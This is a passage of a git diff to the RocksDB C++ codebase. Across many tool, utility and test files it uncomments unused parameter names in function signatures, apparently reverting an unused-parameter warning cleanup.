mem_ioptions(ioptions); memtable_ = new MemTable(internal_comparator_, mem_ioptions, @@ -504,11 +499,11 @@ class DBConstructor: public Constructor { ~DBConstructor() { delete db_; } - virtual Status FinishImpl( - const Options& /*options*/, const ImmutableCFOptions& /*ioptions*/, - const BlockBasedTableOptions& /*table_options*/, - const InternalKeyComparator& /*internal_comparator*/, - const stl_wrappers::KVMap& kv_map) override { + virtual Status FinishImpl(const Options& options, + const ImmutableCFOptions& ioptions, + const BlockBasedTableOptions& table_options, + const InternalKeyComparator& internal_comparator, + const stl_wrappers::KVMap& kv_map) override { delete db_; db_ = nullptr; NewDB(); @@ -670,7 +665,7 @@ class FixedOrLessPrefixTransform : public SliceTransform { return Slice(src.data(), prefix_len_); } - virtual bool InDomain(const Slice& /*src*/) const override { return true; } + virtual bool InDomain(const Slice& src) const override { return true; } virtual bool InRange(const Slice& dst) const override { return (dst.size() <= prefix_len_); @@ -800,7 +795,7 @@ class HarnessTest : public testing::Test { TestRandomAccess(rnd, keys, data); } - void TestForwardScan(const std::vector& /*keys*/, + void TestForwardScan(const std::vector& keys, const stl_wrappers::KVMap& data) { InternalIterator* iter = constructor_->NewIterator(); ASSERT_TRUE(!iter->Valid()); @@ -818,7 +813,7 @@ class HarnessTest : public testing::Test { } } - void TestBackwardScan(const std::vector& /*keys*/, + void TestBackwardScan(const std::vector& keys, const stl_wrappers::KVMap& data) { InternalIterator* iter = constructor_->NewIterator(); ASSERT_TRUE(!iter->Valid()); @@ -1533,7 +1528,7 @@ static std::string RandomString(Random* rnd, int len) { } void AddInternalKey(TableConstructor* c, const std::string& prefix, - int /*suffix_len*/ = 800) { + int suffix_len = 800) { static Random rnd(1023); InternalKey k(prefix + RandomString(&rnd, 800), 0, kTypeValue); c->Add(k.Encode().ToString(), "v"); @@ -2870,7 +2865,7 @@ class TestPrefixExtractor : public rocksdb::SliceTransform { return true; } - bool InRange(const rocksdb::Slice& /*dst*/) const override { return true; } + bool InRange(const rocksdb::Slice& dst) const override { return true; } bool IsValid(const rocksdb::Slice& src) const { if (src.size() != 4) { diff --git a/third-party/fbson/FbsonDocument.h b/third-party/fbson/FbsonDocument.h index fc7ca76ff38..6fb8a93f171 100644 --- a/third-party/fbson/FbsonDocument.h +++ b/third-party/fbson/FbsonDocument.h @@ -355,7 +355,7 @@ class NumberValT : public FbsonValue { unsigned int numPackedBytes() const { return sizeof(FbsonValue) + sizeof(T); } // catch all unknow specialization of the template class - bool setVal(T /*value*/) { return false; } + bool setVal(T value) { return false; } private: T num_; diff --git a/tools/db_bench_tool.cc b/tools/db_bench_tool.cc index dfa00de5adc..0cc424eeab2 100644 --- a/tools/db_bench_tool.cc +++ b/tools/db_bench_tool.cc @@ -235,7 +235,7 @@ DEFINE_bool(use_uint64_comparator, false, "use Uint64 user comparator"); DEFINE_int64(batch_size, 1, "Batch size"); -static bool ValidateKeySize(const char* /*flagname*/, int32_t /*value*/) { +static bool ValidateKeySize(const char* flagname, int32_t value) { return true; } @@ -2041,9 +2041,8 @@ class Benchmark { explicit ExpiredTimeFilter( const std::shared_ptr& timestamp_emulator) : timestamp_emulator_(timestamp_emulator) {} - bool Filter(int /*level*/, const Slice& key, - const Slice& /*existing_value*/, std::string* /*new_value*/, - bool* /*value_changed*/) const override { + bool Filter(int level, const Slice& key, const Slice& existing_value, + std::string* new_value, bool* value_changed) const override { return KeyExpired(timestamp_emulator_.get(), key); } const char* Name() const override { return "ExpiredTimeFilter"; } @@ -3352,9 +3351,12 @@ void VerifyDBFromDB(std::string& truth_db_name) { class KeyGenerator { public: - KeyGenerator(Random64* rand, WriteMode mode, uint64_t num, - uint64_t /*num_per_set*/ = 64 * 1024) - : rand_(rand), mode_(mode), num_(num), next_(0) { + KeyGenerator(Random64* rand, WriteMode mode, + uint64_t num, uint64_t num_per_set = 64 * 1024) + : rand_(rand), + mode_(mode), + num_(num), + next_(0) { if (mode_ == UNIQUE_RANDOM) { // NOTE: if memory consumption of this approach becomes a concern, // we can either break it into pieces and only random shuffle a section diff --git a/tools/ldb_cmd.cc b/tools/ldb_cmd.cc index 1c02ef64026..2cd4d94d112 100644 --- a/tools/ldb_cmd.cc +++ b/tools/ldb_cmd.cc @@ -111,7 +111,7 @@ LDBCommand* LDBCommand::InitFromCmdLineArgs( LDBCommand* LDBCommand::InitFromCmdLineArgs( const std::vector& args, const Options& options, const LDBOptions& ldb_options, - const std::vector* /*column_families*/, + const std::vector* column_families, const std::function& selector) { // --x=y command line arguments are added as x->y map entries in // parsed_params.option_map. @@ -456,7 +456,7 @@ std::vector LDBCommand::BuildCmdLineOptions( * updated. */ bool LDBCommand::ParseIntOption( - const std::map& /*options*/, + const std::map& options, const std::string& option, int& value, LDBCommandExecuteResult& exec_state) { std::map::const_iterator itr = @@ -486,7 +486,7 @@ bool LDBCommand::ParseIntOption( * Returns false otherwise. */ bool LDBCommand::ParseStringOption( - const std::map& /*options*/, + const std::map& options, const std::string& option, std::string* value) { auto itr = option_map_.find(option); if (itr != option_map_.end()) { @@ -764,7 +764,7 @@ bool LDBCommand::StringToBool(std::string val) { } CompactorCommand::CompactorCommand( - const std::vector& /*params*/, + const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, false, @@ -834,7 +834,7 @@ const std::string DBLoaderCommand::ARG_BULK_LOAD = "bulk_load"; const std::string DBLoaderCommand::ARG_COMPACT = "compact"; DBLoaderCommand::DBLoaderCommand( - const std::vector& /*params*/, + const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand( @@ -950,7 +950,7 @@ void ManifestDumpCommand::Help(std::string& ret) { } ManifestDumpCommand::ManifestDumpCommand( - const std::vector& /*params*/, + const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand( @@ -1145,7 +1145,7 @@ const std::string InternalDumpCommand::ARG_STATS = "stats"; const std::string InternalDumpCommand::ARG_INPUT_KEY_HEX = "input_key_hex"; InternalDumpCommand::InternalDumpCommand( - const std::vector& /*params*/, + const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand( @@ -1284,7 +1284,7 @@ const std::string DBDumperCommand::ARG_STATS = "stats"; const std::string DBDumperCommand::ARG_TTL_BUCKET = "bucket"; DBDumperCommand::DBDumperCommand( - const std::vector& /*params*/, + const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, true, @@ -1560,7 +1560,7 @@ const std::string ReduceDBLevelsCommand::ARG_PRINT_OLD_LEVELS = "print_old_levels"; ReduceDBLevelsCommand::ReduceDBLevelsCommand( - const std::vector& /*params*/, + const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, false, @@ -1689,7 +1689,7 @@ const std::string ChangeCompactionStyleCommand::ARG_NEW_COMPACTION_STYLE = "new_compaction_style"; ChangeCompactionStyleCommand::ChangeCompactionStyleCommand( - const std::vector& /*params*/, + const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, false, @@ -1826,7 +1826,7 @@ void ChangeCompactionStyleCommand::DoCommand() { namespace { struct StdErrReporter : public log::Reader::Reporter { - virtual void Corruption(size_t /*bytes*/, const Status& s) override { + virtual void Corruption(size_t bytes, const Status& s) override { std::cerr << "Corruption detected in log file " << s.ToString() << "\n"; } }; @@ -1990,7 +1990,7 @@ const std::string WALDumperCommand::ARG_PRINT_VALUE = "print_value"; const std::string WALDumperCommand::ARG_PRINT_HEADER = "header"; WALDumperCommand::WALDumperCommand( - const std::vector& /*params*/, + const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, true, @@ -2074,7 +2074,7 @@ void GetCommand::DoCommand() { // ---------------------------------------------------------------------------- ApproxSizeCommand::ApproxSizeCommand( - const std::vector& /*params*/, + const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, true, @@ -2190,7 +2190,7 @@ Options BatchPutCommand::PrepareOptionsForOpenDB() { // ---------------------------------------------------------------------------- -ScanCommand::ScanCommand(const std::vector& /*params*/, +ScanCommand::ScanCommand(const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand( @@ -2474,7 +2474,7 @@ const char* DBQuerierCommand::PUT_CMD = "put"; const char* DBQuerierCommand::DELETE_CMD = "delete"; DBQuerierCommand::DBQuerierCommand( - const std::vector& /*params*/, + const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand( @@ -2553,7 +2553,7 @@ void DBQuerierCommand::DoCommand() { // ---------------------------------------------------------------------------- CheckConsistencyCommand::CheckConsistencyCommand( - const std::vector& /*params*/, + const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, false, BuildCmdLineOptions({})) {} @@ -2585,7 +2585,7 @@ void CheckConsistencyCommand::DoCommand() { const std::string CheckPointCommand::ARG_CHECKPOINT_DIR = "checkpoint_dir"; CheckPointCommand::CheckPointCommand( - const std::vector& /*params*/, + const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, false /* is_read_only */, @@ -2623,7 +2623,7 @@ void CheckPointCommand::DoCommand() { // ---------------------------------------------------------------------------- -RepairCommand::RepairCommand(const std::vector& /*params*/, +RepairCommand::RepairCommand(const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, false, BuildCmdLineOptions({})) {} @@ -2653,7 +2653,7 @@ const std::string BackupableCommand::ARG_BACKUP_DIR = "backup_dir"; const std::string BackupableCommand::ARG_STDERR_LOG_LEVEL = "stderr_log_level"; BackupableCommand::BackupableCommand( - const std::vector& /*params*/, + const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, false /* is_read_only */, @@ -2831,7 +2831,7 @@ void DumpSstFile(std::string filename, bool output_hex, bool show_properties) { } // namespace DBFileDumperCommand::DBFileDumperCommand( - const std::vector& /*params*/, + const std::vector& params, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, true, BuildCmdLineOptions({})) {} diff --git a/tools/ldb_tool.cc b/tools/ldb_tool.cc index b09076ecc61..e8229ef7b91 100644 --- a/tools/ldb_tool.cc +++ b/tools/ldb_tool.cc @@ -13,7 +13,7 @@ namespace rocksdb { LDBOptions::LDBOptions() {} void LDBCommandRunner::PrintHelp(const LDBOptions& ldb_options, - const char* /*exec_name*/) { + const char* exec_name) { std::string ret; ret.append(ldb_options.print_help_header); diff --git a/tools/sst_dump_tool.cc b/tools/sst_dump_tool.cc index 6110d5d5c40..2a1729c7651 100644 --- a/tools/sst_dump_tool.cc +++ b/tools/sst_dump_tool.cc @@ -110,9 +110,9 @@ Status SstFileReader::GetTableReader(const std::string& file_path) { } Status SstFileReader::NewTableReader( - const ImmutableCFOptions& /*ioptions*/, const EnvOptions& /*soptions*/, - const InternalKeyComparator& /*internal_comparator*/, uint64_t file_size, - unique_ptr* /*table_reader*/) { + const ImmutableCFOptions& ioptions, const EnvOptions& soptions, + const InternalKeyComparator& internal_comparator, uint64_t file_size, + unique_ptr* table_reader) { // We need to turn off pre-fetching of index and filter nodes for // BlockBasedTable shared_ptr block_table_factory = diff --git a/util/compression.h b/util/compression.h index b75672f1438..468b961fbfd 100644 --- a/util/compression.h +++ b/util/compression.h @@ -151,9 +151,8 @@ inline std::string CompressionTypeToString(CompressionType compression_type) { // 2 -- Zlib, BZip2 and LZ4 encode decompressed size as Varint32 just before the // start of compressed block. Snappy format is the same as version 1. -inline bool Snappy_Compress(const CompressionOptions& /*opts*/, - const char* input, size_t length, - ::std::string* output) { +inline bool Snappy_Compress(const CompressionOptions& opts, const char* input, + size_t length, ::std::string* output) { #ifdef SNAPPY output->resize(snappy::MaxCompressedLength(length)); size_t outlen; @@ -382,9 +381,10 @@ inline char* Zlib_Uncompress(const char* input_data, size_t input_length, // block header // compress_format_version == 2 -- decompressed size is included in the block // header in varint32 format -inline bool BZip2_Compress(const CompressionOptions& /*opts*/, - uint32_t compress_format_version, const char* input, - size_t length, ::std::string* output) { +inline bool BZip2_Compress(const CompressionOptions& opts, + uint32_t compress_format_version, + const char* input, size_t length, + ::std::string* output) { #ifdef BZIP2 if (length > std::numeric_limits::max()) { // Can't compress more than 4GB @@ -520,7 +520,7 @@ inline char* BZip2_Uncompress(const char* input_data, size_t input_length, // header in varint32 format // @param compression_dict Data for presetting the compression library's // dictionary. -inline bool LZ4_Compress(const CompressionOptions& /*opts*/, +inline bool LZ4_Compress(const CompressionOptions& opts, uint32_t compress_format_version, const char* input, size_t length, ::std::string* output, const Slice compression_dict = Slice()) { @@ -705,17 +705,15 @@ inline bool LZ4HC_Compress(const CompressionOptions& opts, return false; } -inline bool XPRESS_Compress(const char* /*input*/, size_t /*length*/, - std::string* /*output*/) { +inline bool XPRESS_Compress(const char* input, size_t length, std::string* output) { #ifdef XPRESS return port::xpress::Compress(input, length, output); #endif return false; } -inline char* XPRESS_Uncompress(const char* /*input_data*/, - size_t /*input_length*/, - int* /*decompress_size*/) { +inline char* XPRESS_Uncompress(const char* input_data, size_t input_length, + int* decompress_size) { #ifdef XPRESS return port::xpress::Decompress(input_data, input_length, decompress_size); #endif diff --git a/util/delete_scheduler_test.cc b/util/delete_scheduler_test.cc index 7d531244c6d..208bdd74177 100644 --- a/util/delete_scheduler_test.cc +++ b/util/delete_scheduler_test.cc @@ -239,7 +239,7 @@ TEST_F(DeleteSchedulerTest, DisableRateLimiting) { int bg_delete_file = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DeleteScheduler::DeleteTrashFile:DeleteFile", - [&](void* /*arg*/) { bg_delete_file++; }); + [&](void* arg) { bg_delete_file++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); @@ -346,7 +346,7 @@ TEST_F(DeleteSchedulerTest, StartBGEmptyTrashMultipleTimes) { int bg_delete_file = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DeleteScheduler::DeleteTrashFile:DeleteFile", - [&](void* /*arg*/) { bg_delete_file++; }); + [&](void* arg) { bg_delete_file++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); rate_bytes_per_sec_ = 1024 * 1024; // 1 MB / sec @@ -381,7 +381,7 @@ TEST_F(DeleteSchedulerTest, DestructorWithNonEmptyQueue) { int bg_delete_file = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DeleteScheduler::DeleteTrashFile:DeleteFile", - [&](void* /*arg*/) { bg_delete_file++; }); + [&](void* arg) { bg_delete_file++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); rate_bytes_per_sec_ = 1; // 1 Byte / sec @@ -410,7 +410,7 @@ TEST_F(DeleteSchedulerTest, MoveToTrashError) { int bg_delete_file = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DeleteScheduler::DeleteTrashFile:DeleteFile", - [&](void* /*arg*/) { bg_delete_file++; }); + [&](void* arg) { bg_delete_file++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); rate_bytes_per_sec_ = 1024; // 1 Kb / sec @@ -436,9 +436,10 @@ TEST_F(DeleteSchedulerTest, DISABLED_DynamicRateLimiting1) { int fg_delete_file = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DeleteScheduler::DeleteTrashFile:DeleteFile", - [&](void* /*arg*/) { bg_delete_file++; }); + [&](void* arg) { bg_delete_file++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DeleteScheduler::DeleteFile", [&](void* /*arg*/) { fg_delete_file++; }); + "DeleteScheduler::DeleteFile", + [&](void* arg) { fg_delete_file++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DeleteScheduler::BackgroundEmptyTrash:Wait", [&](void* arg) { penalties.push_back(*(static_cast(arg))); }); @@ -517,9 +518,9 @@ TEST_F(DeleteSchedulerTest, ImmediateDeleteOn25PercDBSize) { int fg_delete_file = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DeleteScheduler::DeleteTrashFile:DeleteFile", - [&](void* /*arg*/) { bg_delete_file++; }); + [&](void* arg) { bg_delete_file++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DeleteScheduler::DeleteFile", [&](void* /*arg*/) { fg_delete_file++; }); + "DeleteScheduler::DeleteFile", [&](void* arg) { fg_delete_file++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); diff --git a/util/file_reader_writer_test.cc b/util/file_reader_writer_test.cc index aa81992666a..dac5182452b 100644 --- a/util/file_reader_writer_test.cc +++ b/util/file_reader_writer_test.cc @@ -26,7 +26,9 @@ TEST_F(WritableFileWriterTest, RangeSync) { size_ += data.size(); return Status::OK(); } - virtual Status Truncate(uint64_t /*size*/) override { return Status::OK(); } + virtual Status Truncate(uint64_t size) override { + return Status::OK(); + } Status Close() override { EXPECT_GE(size_, last_synced_ + kMb); EXPECT_LT(size_, last_synced_ + 2 * kMb); @@ -37,21 +39,17 @@ TEST_F(WritableFileWriterTest, RangeSync) { Status Flush() override { return Status::OK(); } Status Sync() override { return Status::OK(); } Status Fsync() override { return Status::OK(); } - void SetIOPriority(Env::IOPriority /*pri*/) override {} + void SetIOPriority(Env::IOPriority pri) override {} uint64_t GetFileSize() override { return size_; } - void GetPreallocationStatus(size_t* /*block_size*/, - size_t* /*last_allocated_block*/) override {} - size_t GetUniqueId(char* /*id*/, size_t /*max_size*/) const override { - return 0; - } - Status InvalidateCache(size_t /*offset*/, size_t /*length*/) override { + void GetPreallocationStatus(size_t* block_size, + size_t* last_allocated_block) override {} + size_t GetUniqueId(char* id, size_t max_size) const override { return 0; } + Status InvalidateCache(size_t offset, size_t length) override { return Status::OK(); } protected: - Status Allocate(uint64_t /*offset*/, uint64_t /*len*/) override { - return Status::OK(); - } + Status Allocate(uint64_t offset, uint64_t len) override { return Status::OK(); } Status RangeSync(uint64_t offset, uint64_t nbytes) override { EXPECT_EQ(offset % 4096, 0u); EXPECT_EQ(nbytes % 4096, 0u); @@ -121,14 +119,12 @@ TEST_F(WritableFileWriterTest, IncrementalBuffer) { Status Flush() override { return Status::OK(); } Status Sync() override { return Status::OK(); } Status Fsync() override { return Status::OK(); } - void SetIOPriority(Env::IOPriority /*pri*/) override {} + void SetIOPriority(Env::IOPriority pri) override {} uint64_t GetFileSize() override { return size_; } - void GetPreallocationStatus(size_t* /*block_size*/, - size_t* /*last_allocated_block*/) override {} - size_t GetUniqueId(char* /*id*/, size_t /*max_size*/) const override { - return 0; - } - Status InvalidateCache(size_t /*offset*/, size_t /*length*/) override { + void GetPreallocationStatus(size_t* block_size, + size_t* last_allocated_block) override {} + size_t GetUniqueId(char* id, size_t max_size) const override { return 0; } + Status InvalidateCache(size_t offset, size_t length) override { return Status::OK(); } bool use_direct_io() const override { return use_direct_io_; } @@ -178,13 +174,13 @@ TEST_F(WritableFileWriterTest, AppendStatusReturn) { explicit FakeWF() : use_direct_io_(false), io_error_(false) {} virtual bool use_direct_io() const override { return use_direct_io_; } - Status Append(const Slice& /*data*/) override { + Status Append(const Slice& data) override { if (io_error_) { return Status::IOError("Fake IO error"); } return Status::OK(); } - Status PositionedAppend(const Slice& /*data*/, uint64_t) override { + Status PositionedAppend(const Slice& data, uint64_t) override { if (io_error_) { return Status::IOError("Fake IO error"); } diff --git a/util/slice.cc b/util/slice.cc index eed59657f86..8d95a8ae19d 100644 --- a/util/slice.cc +++ b/util/slice.cc @@ -74,7 +74,7 @@ class CappedPrefixTransform : public SliceTransform { return Slice(src.data(), std::min(cap_len_, src.size())); } - virtual bool InDomain(const Slice& /*src*/) const override { return true; } + virtual bool InDomain(const Slice& src) const override { return true; } virtual bool InRange(const Slice& dst) const override { return (dst.size() <= cap_len_); @@ -93,11 +93,11 @@ class NoopTransform : public SliceTransform { virtual Slice Transform(const Slice& src) const override { return src; } - virtual bool InDomain(const Slice& /*src*/) const override { return true; } + virtual bool InDomain(const Slice& src) const override { return true; } - virtual bool InRange(const Slice& /*dst*/) const override { return true; } + virtual bool InRange(const Slice& dst) const override { return true; } - virtual bool SameResultWhenAppended(const Slice& /*prefix*/) const override { + virtual bool SameResultWhenAppended(const Slice& prefix) const override { return false; } }; diff --git a/util/testutil.cc b/util/testutil.cc index 5164101441d..f3010f3f2c0 100644 --- a/util/testutil.cc +++ b/util/testutil.cc @@ -107,12 +107,12 @@ class Uint64ComparatorImpl : public Comparator { } } - virtual void FindShortestSeparator(std::string* /*start*/, - const Slice& /*limit*/) const override { + virtual void FindShortestSeparator(std::string* start, + const Slice& limit) const override { return; } - virtual void FindShortSuccessor(std::string* /*key*/) const override { + virtual void FindShortSuccessor(std::string* key) const override { return; } }; diff --git a/util/testutil.h b/util/testutil.h index 069b883f285..02bfb0ff6d2 100644 --- a/util/testutil.h +++ b/util/testutil.h @@ -121,10 +121,10 @@ class SimpleSuffixReverseComparator : public Comparator { return -(suffix_a.compare(suffix_b)); } } - virtual void FindShortestSeparator(std::string* /*start*/, - const Slice& /*limit*/) const override {} + virtual void FindShortestSeparator(std::string* start, + const Slice& limit) const override {} - virtual void FindShortSuccessor(std::string* /*key*/) const override {} + virtual void FindShortSuccessor(std::string* key) const override {} }; // Returns a user key comparator that can be used for comparing two uint64_t @@ -255,8 +255,7 @@ class RandomRWStringSink : public RandomRWFile { return Status::OK(); } - Status Read(uint64_t offset, size_t n, Slice* result, - char* /*scratch*/) const { + Status Read(uint64_t offset, size_t n, Slice* result, char* scratch) const { *result = Slice(nullptr, 0); if (offset < ss_->contents_.size()) { size_t str_res_sz = @@ -377,7 +376,7 @@ class StringSource: public RandomAccessFile { class NullLogger : public Logger { public: using Logger::Logv; - virtual void Logv(const char* /*format*/, va_list /*ap*/) override {} + virtual void Logv(const char* format, va_list ap) override {} virtual size_t GetLogFileSize() const override { return 0; } }; @@ -458,16 +457,15 @@ class FilterNumber : public CompactionFilter { std::string last_merge_operand_key() { return last_merge_operand_key_; } - bool Filter(int /*level*/, const rocksdb::Slice& /*key*/, - const rocksdb::Slice& value, std::string* /*new_value*/, - bool* /*value_changed*/) const override { + bool Filter(int level, const rocksdb::Slice& key, const rocksdb::Slice& value, + std::string* new_value, bool* value_changed) const override { if (value.size() == sizeof(uint64_t)) { return num_ == DecodeFixed64(value.data()); } return true; } - bool FilterMergeOperand(int /*level*/, const rocksdb::Slice& key, + bool FilterMergeOperand(int level, const rocksdb::Slice& key, const rocksdb::Slice& value) const override { last_merge_operand_key_ = key.ToString(); if (value.size() == sizeof(uint64_t)) { @@ -565,7 +563,7 @@ class StringEnv : public EnvWrapper { // The following text is boilerplate that forwards all methods to target() Status NewSequentialFile(const std::string& f, unique_ptr* r, - const EnvOptions& /*options*/) override { + const EnvOptions& options) override { auto iter = files_.find(f); if (iter == files_.end()) { return Status::NotFound("The specified file does not exist", f); @@ -573,13 +571,13 @@ class StringEnv : public EnvWrapper { r->reset(new SeqStringSource(iter->second)); return Status::OK(); } - Status NewRandomAccessFile(const std::string& /*f*/, - unique_ptr* /*r*/, - const EnvOptions& /*options*/) override { + Status NewRandomAccessFile(const std::string& f, + unique_ptr* r, + const EnvOptions& options) override { return Status::NotSupported(); } Status NewWritableFile(const std::string& f, unique_ptr* r, - const EnvOptions& /*options*/) override { + const EnvOptions& options) override { auto iter = files_.find(f); if (iter != files_.end()) { return Status::IOError("The specified file already exists", f); @@ -587,8 +585,8 @@ class StringEnv : public EnvWrapper { r->reset(new StringSink(&files_[f])); return Status::OK(); } - virtual Status NewDirectory(const std::string& /*name*/, - unique_ptr* /*result*/) override { + virtual Status NewDirectory(const std::string& name, + unique_ptr* result) override { return Status::NotSupported(); } Status FileExists(const std::string& f) override { @@ -597,21 +595,21 @@ class StringEnv : public EnvWrapper { } return Status::OK(); } - Status GetChildren(const std::string& /*dir*/, - std::vector* /*r*/) override { + Status GetChildren(const std::string& dir, + std::vector* r) override { return Status::NotSupported(); } Status DeleteFile(const std::string& f) override { files_.erase(f); return Status::OK(); } - Status CreateDir(const std::string& /*d*/) override { + Status CreateDir(const std::string& d) override { return Status::NotSupported(); } - Status CreateDirIfMissing(const std::string& /*d*/) override { + Status CreateDirIfMissing(const std::string& d) override { return Status::NotSupported(); } - Status DeleteDir(const std::string& /*d*/) override { + Status DeleteDir(const std::string& d) override { return Status::NotSupported(); } Status GetFileSize(const std::string& f, uint64_t* s) override { @@ -623,25 +621,24 @@ class StringEnv : public EnvWrapper { return Status::OK(); } - Status GetFileModificationTime(const std::string& /*fname*/, - uint64_t* /*file_mtime*/) override { + Status GetFileModificationTime(const std::string& fname, + uint64_t* file_mtime) override { return Status::NotSupported(); } - Status RenameFile(const std::string& /*s*/, - const std::string& /*t*/) override { + Status RenameFile(const std::string& s, const std::string& t) override { return Status::NotSupported(); } - Status LinkFile(const std::string& /*s*/, const std::string& /*t*/) override { + Status LinkFile(const std::string& s, const std::string& t) override { return Status::NotSupported(); } - Status LockFile(const std::string& /*f*/, FileLock** /*l*/) override { + Status LockFile(const std::string& f, FileLock** l) override { return Status::NotSupported(); } - Status UnlockFile(FileLock* /*l*/) override { return Status::NotSupported(); } + Status UnlockFile(FileLock* l) override { return Status::NotSupported(); } protected: std::unordered_map files_; @@ -664,14 +661,14 @@ class ChanglingMergeOperator : public MergeOperator { void SetName(const std::string& name) { name_ = name; } - virtual bool FullMergeV2(const MergeOperationInput& /*merge_in*/, - MergeOperationOutput* /*merge_out*/) const override { + virtual bool FullMergeV2(const MergeOperationInput& merge_in, + MergeOperationOutput* merge_out) const override { return false; } - virtual bool PartialMergeMulti(const Slice& /*key*/, - const std::deque& /*operand_list*/, - std::string* /*new_value*/, - Logger* /*logger*/) const override { + virtual bool PartialMergeMulti(const Slice& key, + const std::deque& operand_list, + std::string* new_value, + Logger* logger) const override { return false; } virtual const char* Name() const override { return name_.c_str(); } @@ -692,9 +689,8 @@ class ChanglingCompactionFilter : public CompactionFilter { void SetName(const std::string& name) { name_ = name; } - bool Filter(int /*level*/, const Slice& /*key*/, - const Slice& /*existing_value*/, std::string* /*new_value*/, - bool* /*value_changed*/) const override { + bool Filter(int level, const Slice& key, const Slice& existing_value, + std::string* new_value, bool* value_changed) const override { return false; } @@ -717,7 +713,7 @@ class ChanglingCompactionFilterFactory : public CompactionFilterFactory { void SetName(const std::string& name) { name_ = name; } std::unique_ptr CreateCompactionFilter( - const CompactionFilter::Context& /*context*/) override { + const CompactionFilter::Context& context) override { return std::unique_ptr(); } diff --git a/util/thread_local_test.cc b/util/thread_local_test.cc index 789be83d8fd..6fee5eaa574 100644 --- a/util/thread_local_test.cc +++ b/util/thread_local_test.cc @@ -535,7 +535,7 @@ TEST_F(ThreadLocalTest, CompareAndSwap) { namespace { -void* AccessThreadLocal(void* /*arg*/) { +void* AccessThreadLocal(void* arg) { TEST_SYNC_POINT("AccessThreadLocal:Start"); ThreadLocalPtr tlp; tlp.Reset(new std::string("hello RocksDB")); diff --git a/utilities/backupable/backupable_db.cc b/utilities/backupable/backupable_db.cc index 53f450dac43..8921309e469 100644 --- a/utilities/backupable/backupable_db.cc +++ b/utilities/backupable/backupable_db.cc @@ -754,7 +754,7 @@ Status BackupEngineImpl::CreateNewBackupWithMetadata( uint64_t sequence_number = 0; s = checkpoint.CreateCustomCheckpoint( db->GetDBOptions(), - [&](const std::string& /*src_dirname*/, const std::string& /*fname*/, + [&](const std::string& src_dirname, const std::string& fname, FileType) { // custom checkpoint will switch to calling copy_file_cb after it sees // NotSupported returned from link_file_cb. diff --git a/utilities/backupable/backupable_db_test.cc b/utilities/backupable/backupable_db_test.cc index 8b68c215310..be20a8d9b3d 100644 --- a/utilities/backupable/backupable_db_test.cc +++ b/utilities/backupable/backupable_db_test.cc @@ -57,8 +57,7 @@ class DummyDB : public StackableDB { } using DB::GetOptions; - virtual Options GetOptions( - ColumnFamilyHandle* /*column_family*/) const override { + virtual Options GetOptions(ColumnFamilyHandle* column_family) const override { return options_; } @@ -66,7 +65,7 @@ class DummyDB : public StackableDB { return DBOptions(options_); } - virtual Status EnableFileDeletions(bool /*force*/) override { + virtual Status EnableFileDeletions(bool force) override { EXPECT_TRUE(!deletions_enabled_); deletions_enabled_ = true; return Status::OK(); @@ -79,7 +78,7 @@ class DummyDB : public StackableDB { } virtual Status GetLiveFiles(std::vector& vec, uint64_t* mfs, - bool /*flush_memtable*/ = true) override { + bool flush_memtable = true) override { EXPECT_TRUE(!deletions_enabled_); vec = live_files_; *mfs = 100; @@ -136,7 +135,7 @@ class DummyDB : public StackableDB { } // To avoid FlushWAL called on stacked db which is nullptr - virtual Status FlushWAL(bool /*sync*/) override { return Status::OK(); } + virtual Status FlushWAL(bool sync) override { return Status::OK(); } std::vector live_files_; // pair @@ -522,7 +521,7 @@ class BackupableDBTest : public testing::Test { void OpenDBAndBackupEngineShareWithChecksum( bool destroy_old_data = false, bool dummy = false, - bool /*share_table_files*/ = true, bool share_with_checksums = false) { + bool share_table_files = true, bool share_with_checksums = false) { backupable_options_->share_files_with_checksum = share_with_checksums; OpenDBAndBackupEngine(destroy_old_data, dummy, share_with_checksums); } diff --git a/utilities/blob_db/blob_db.h b/utilities/blob_db/blob_db.h index 0b101e968f6..f45a42f60a9 100644 --- a/utilities/blob_db/blob_db.h +++ b/utilities/blob_db/blob_db.h @@ -147,9 +147,9 @@ class BlobDB : public StackableDB { const Slice& key) override = 0; using rocksdb::StackableDB::Merge; - virtual Status Merge(const WriteOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/, - const Slice& /*key*/, const Slice& /*value*/) override { + virtual Status Merge(const WriteOptions& options, + ColumnFamilyHandle* column_family, const Slice& key, + const Slice& value) override { return Status::NotSupported("Not supported operation in blob db."); } diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index e1648271170..1dd72b6bc3a 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -143,9 +143,8 @@ void BlobDBFlushBeginListener::OnFlushBegin(DB* db, const FlushJobInfo& info) { } 